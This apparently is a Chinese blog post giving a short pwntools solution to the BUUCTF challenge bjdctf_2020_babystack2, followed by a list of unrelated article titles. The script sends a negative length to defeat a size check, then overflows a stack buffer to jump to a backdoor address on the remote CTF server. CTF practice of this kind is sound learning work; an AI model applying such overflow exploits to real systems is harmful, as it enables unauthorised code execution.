buu-bjdctf_2020_babystack2-好久不见51

from pwn import *

# 连接到远程服务器
p = remote("node5.buuoj.cn", 28526)

# 定义后门地址
backdoor = 0x400726

# 发送初始输入
p.sendlineafter(b"your name:", b'-1')

# 构造溢出载荷
# 0x10 是缓冲区大小，8 是返回地址的偏移量
payload = b'a' * (0x10 + 8) + p64(backdoor)

# 发送溢出载荷
p.sendlineafter(b"u name?", payload)

# 进入交互模式
p.interactive()

相关文章：

Nodejs 项目打包部署方式

博客系统自动化测试报告

Java实现十大经典排序算法详解

firefly经典蓝牙和QProcess记录

MinIO

使用 Apktool 反编译、修改和重新打包 APK

1978-2022年全国及31省农业机械总动力数据（无缺失）

开源ORB_SLAM2项目编译常见问题与应对办法

分布式（一）：CAPBASE理论

Excel（实战）：INDEX函数和MATCH函数

QSettings修改配置后强制重启应用导致配置文件大小为0问题

基于Azure Delta Lake与Databricks的医疗数据变更管理

优选算法训练篇08--力扣15.三数之和(难度中等)

第4章 IP网络扫描（网络安全评估）

【科研杂记_10】国家行政区划可视化

[特殊字符][特殊字符][特殊字符][特殊字符][特殊字符][特殊字符]壁紙 流光染墨，碎影入梦

C++基础 [十二] - 继承与派生

SpringSecurity——前后端分离登录状态如何保持

【Vitis AI】FPGA设备使用PyTorch 运行 ResNet18获得10000fps

直接插入排序和折半插入排序

LeetCode 2517礼盒的最大甜蜜度

Linux中，常用的快捷键分类整理（欢迎补充噢）

网络华为HCIA+HCIP IPv6

深入解析文本词汇处理代码——如何用有限词表实现无限表达

mysql 磐维（opengauss）tidb误删数据之高级恢复

文献阅读篇#2：YOLO改进类的文章如何高效进行文献阅读（对于初学者）

纯vue手写流程组件

cursor无限续杯软件操作教程

HWHVV护网入门基础知识

在图片上高亮标注区域